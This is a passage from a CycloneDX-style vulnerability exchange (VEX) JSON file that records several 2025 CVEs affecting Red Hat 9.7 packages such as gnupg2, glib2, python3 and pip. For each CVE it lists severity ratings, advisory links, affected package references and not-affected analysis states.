"urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2025-30258", "ratings": [ { "source": { "name": "amazon" }, "severity": "low" }, { "source": { "name": "azure" }, "severity": "low" }, { "source": { "name": "nvd" }, "score": 4.7, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H" }, { "source": { "name": "redhat" }, "score": 2.7, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:N/I:N/A:L" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 754 ], "description": "In GnuPG before 2.5.5, if a user chooses to import a certificate with certain crafted subkey data that lacks a valid backsig or that has incorrect usage flags, the user loses the ability to verify signatures made from certain other signing keys, aka a \"verification DoS.\"", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-30258" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-30258" }, { "url": "https://dev.gnupg.org/T7527" }, { "url": "https://dev.gnupg.org/rG48978ccb4e20866472ef18436a32744350a65158" }, { "url": "https://lists.gnupg.org/pipermail/gnupg-announce/2025q1/000491.html" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30258" }, { "url": "https://ubuntu.com/security/notices/USN-7412-1" }, { "url": "https://ubuntu.com/security/notices/USN-7412-3" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-30258" } ], "published": "2025-03-19T20:15:20+00:00", "updated": "2025-10-16T16:53:07+00:00", "affects": [ { "ref": "pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.3.3-5.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "code_not_reachable", "response": [ "update" ], "detail": null } }, { "id": "CVE-2025-3360", "ratings": [ { "source": { "name": "amazon" }, "severity": "high" }, { "source": { "name": "azure" }, "severity": "low" }, { "source": { "name": "cbl-mariner" }, "severity": "low" }, { "source": { "name": "redhat" }, "score": 3.7, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "source": { "name": "ubuntu" }, "severity": "low" } ], "cwes": [ 190 ], "description": "A flaw was found in GLib. An integer overflow and buffer under-read occur when parsing a long invalid ISO 8601 timestamp with the g_date_time_new_from_iso8601() function.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-3360" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-3360" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2357754" }, { "url": "https://lists.debian.org/debian-lts-announce/2025/04/msg00024.html" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-3360" }, { "url": "https://ubuntu.com/security/notices/USN-7942-1" }, { "url": "https://ubuntu.com/security/notices/USN-7942-2" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-3360" } ], "published": "2025-04-07T13:15:43+00:00", "updated": "2026-04-15T00:35:42+00:00", "affects": [ { "ref": "pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.68.4-18.el9_7.1", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "code_not_reachable", "response": [ "update" ], "detail": null } }, { "id": "CVE-2025-4516", "ratings": [ { "source": { "name": "alma" }, "severity": "high" }, { "source": { "name": "amazon" }, "severity": "high" }, { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "cbl-mariner" }, "severity": "medium" }, { "source": { "name": "oracle-oval" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 5.1, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "source": { "name": "rocky" }, "severity": "high" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 416 ], "description": "There is an issue in CPython when using `bytes.decode(\"unicode_escape\", error=\"ignore|replace\")`. If you are not using the \"unicode_escape\" encoding or an error handler your usage is not affected. To work-around this issue you may stop using the error= handler and instead wrap the bytes.decode() call in a try-except catching the DecodeError.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-4516" }, { "url": "http://www.openwall.com/lists/oss-security/2025/05/16/4" }, { "url": "http://www.openwall.com/lists/oss-security/2025/05/19/1" }, { "url": "https://access.redhat.com/errata/RHSA-2025:23530" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-4516" }, { "url": "https://bugzilla.redhat.com/2294682" }, { "url": "https://bugzilla.redhat.com/2321440" }, { "url": "https://bugzilla.redhat.com/2325776" }, { "url": "https://bugzilla.redhat.com/2343237" }, { "url": "https://bugzilla.redhat.com/2366509" }, { "url": "https://bugzilla.redhat.com/2370010" }, { "url": "https://bugzilla.redhat.com/2370014" }, { "url": "https://bugzilla.redhat.com/2370016" }, { "url": "https://bugzilla.redhat.com/2372426" }, { "url": "https://bugzilla.redhat.com/2373234" }, { "url": "https://bugzilla.redhat.com/2402342" }, { "url": "https://bugzilla.redhat.com/2408891" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294682" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2321440" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2325776" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2343237" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2366509" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370010" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370014" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370016" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2372426" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2373234" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2402342" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-11168" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5642" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-9287" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0938" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4138" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4330" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4435" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4516" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4517" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6069" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8291" }, { "url": "https://errata.almalinux.org/8/ALSA-2025-23530.html" }, { "url": "https://errata.rockylinux.org/RLSA-2025:23530" }, { "url": "https://github.com/python/cpython/commit/4398b788ffc1f954a2c552da285477d42a571292" }, { "url": "https://github.com/python/cpython/commit/5646648678295a44aa82636c6e92826651baf33a" }, { "url": "https://github.com/python/cpython/commit/6279eb8c076d89d3739a6edb393e43c7929b429d" }, { "url": "https://github.com/python/cpython/commit/69b4387f78f413e8c47572a85b3478c47eba8142" }, { "url": "https://github.com/python/cpython/commit/73b3040f592436385007918887b7e2132aa8431f" }, { "url": "https://github.com/python/cpython/commit/8d35fd1b34935221aff23a1ab69a429dd156be77" }, { "url": "https://github.com/python/cpython/commit/9f69a58623bd01349a18ba0c7a9cb1dad6a51e8e" }, { "url": "https://github.com/python/cpython/commit/9f69a58623bd01349a18ba0c7a9cb1dad6a51e8e" }, { "url": "https://github.com/python/cpython/commit/ab9893c40609935e0d40a6d2a7307ea51aec598b" }, { "url": "https://github.com/python/cpython/issues/133767" }, { "url": "https://github.com/python/cpython/pull/129648" }, { "url": "https://linux.oracle.com/cve/CVE-2025-4516.html" }, { "url": "https://linux.oracle.com/errata/ELSA-2025-23530.html" }, { "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/L75IPBBTSCYEF56I2M4KIW353BB3AY74/" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-4516" }, { "url": "https://ubuntu.com/security/notices/USN-7570-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-4516" } ], "published": "2025-05-15T14:15:31+00:00", "updated": "2026-04-15T00:35:42+00:00", "affects": [ { "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2025-50181", "ratings": [ { "source": { "name": "amazon" }, "severity": "medium" }, { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "cbl-mariner" }, "severity": "medium" }, { "source": { "name": "ghsa" }, "score": 5.3, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "source": { "name": "nvd" }, "score": 6.1, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 5.3, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 601 ], "description": "urllib3 is a user-friendly HTTP client library for Python. Prior to 2.5.0, it is possible to disable redirects for all requests by instantiating a PoolManager and specifying retries in a way that disable redirects. By default, requests and botocore users are not affected. An application attempting to mitigate SSRF or open redirect vulnerabilities by disabling redirects at the PoolManager level will remain vulnerable. This issue has been patched in version 2.5.0.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-50181" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-50181" }, { "url": "https://github.com/urllib3/urllib3" }, { "url": "https://github.com/urllib3/urllib3/commit/f05b1329126d5be6de501f9d1e3e36738bc08857" }, { "url": "https://github.com/urllib3/urllib3/releases/tag/2.5.0" }, { "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-pq67-6m6q-mj2v" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50181" }, { "url": "https://ubuntu.com/security/notices/USN-7599-1" }, { "url": "https://ubuntu.com/security/notices/USN-7599-2" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-50181" } ], "published": "2025-06-19T01:15:24+00:00", "updated": "2025-12-22T19:15:49+00:00", "affects": [ { "ref": "pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7", "versions": [ { "version": "21.3.1-1.el9", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3-pip@21.3.1-1.el9?arch=noarch&distro=redhat-9.7", "versions": [ { "version": "21.3.1-1.el9", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-pip@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": 